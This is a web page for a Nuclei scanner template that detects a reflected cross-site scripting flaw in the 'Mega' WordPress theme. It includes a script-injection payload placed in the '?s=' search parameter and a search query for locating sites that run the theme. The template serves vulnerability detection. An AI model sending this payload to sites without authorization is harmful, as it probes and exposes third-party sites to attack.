Skip to content

Mega Wordpress Theme - Cross site scripting

ID: wp-mega-theme

Severity: medium

Author: r3Y3r53

Tags: wp,wp-theme,wordpress,xss,mega

WordPress theme with a ‘Mega-Theme’ design is vulnerable to a reflected XSS attack through the ‘?s=’ parameter.

id: wp-mega-theme
info:
name: Mega Wordpress Theme - Cross site scripting
author: r3Y3r53
severity: medium
description: |
WordPress theme with a 'Mega-Theme' design is vulnerable to a reflected XSS attack through the '?s=' parameter.
reference:
- https://cxsecurity.com/issue/WLB-2021120027
- https://www.zhaket.com/web/megawp-wordpress-theme
metadata:
verified: true
max-request: 1
google-query: Megawp-Theme
tags: wp,wp-theme,wordpress,xss,mega
http:
- method: GET
path:
- "{{BaseURL}}/?s=%22%3E%3Cscript%3Ealert(`document.domain`)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "script>alert(`document.domain`)</script") && contains(body, "mega-theme")'
condition: and
# digest: 4b0a00483046022100c4c690e3340c089cd675d04dccd4b98b2281c66005e3ac2473749277f437cc9b0221009a82192dfb87746eed63ff2430fca649b293c7bdf5cb1ca0bcc8510dcb123d76:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wp-mega-theme.yaml"

View on Github